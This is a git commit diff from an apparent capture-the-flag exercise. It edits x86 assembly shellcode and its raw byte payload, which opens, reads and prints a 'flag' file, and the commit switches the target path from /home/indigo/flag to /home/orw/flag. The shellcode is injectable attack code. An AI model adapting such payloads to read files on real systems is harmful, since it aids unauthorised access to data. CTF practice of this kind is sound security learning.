diff options
author | Brett Weiland <brett_weiland@bpcspace.com> | 2020-10-27 05:45:54 -0500 |
---|---|---|
committer | Brett Weiland <brett_weiland@bpcspace.com> | 2020-10-27 05:45:54 -0500 |
commit | eac4f540f0e7ae16ff9b58d0d91eb70a98f00bc5 (patch) | |
tree | d62fc0b34b40fea9e75968516a81fad094fe266a | |
parent | fde539741a42a29e39cc25d34b95e34978fe902c (diff) |
modified: fread.asm
modified: fread.o
modified: payload
-rwxr-xr-x | fread | bin | 4296 -> 4292 bytes | |||
-rw-r--r-- | fread.asm | 4 | ||||
-rw-r--r-- | fread.o | bin | 528 -> 528 bytes | |||
-rwxr-xr-x | payload | 2 |
4 files changed, 3 insertions, 3 deletions
Binary files differ @@ -9,7 +9,7 @@ xor ecx, ecx ; arg2 xor edx, edx ; #/usr/include/asm-generic/fcntl.h includes define O_RDONLY 00000000 pop ebx -mov [ebx + 18], ecx ; arg1 +mov [ebx + 15], ecx ; arg1 int 0x80 ;eax now contains our file descriptor. @@ -33,5 +33,5 @@ int 0x80 data: call str_found -db "/home/indigo/flag" +db "/home/orw/flag" @@ -1 +1 @@ -ë$1À°1É1Ò[‰KÍ€‰Ã°‰á1Ò²ÿÍ€°1Û³‰áÍ€è×ÿÿÿ/home/indigo/flag
\ No newline at end of file +ë$1À°1É1Ò[‰KÍ€‰Ã°‰á1Ò²ÿÍ€°1Û³‰áÍ€è×ÿÿÿ/home/orw/flag
\ No newline at end of file |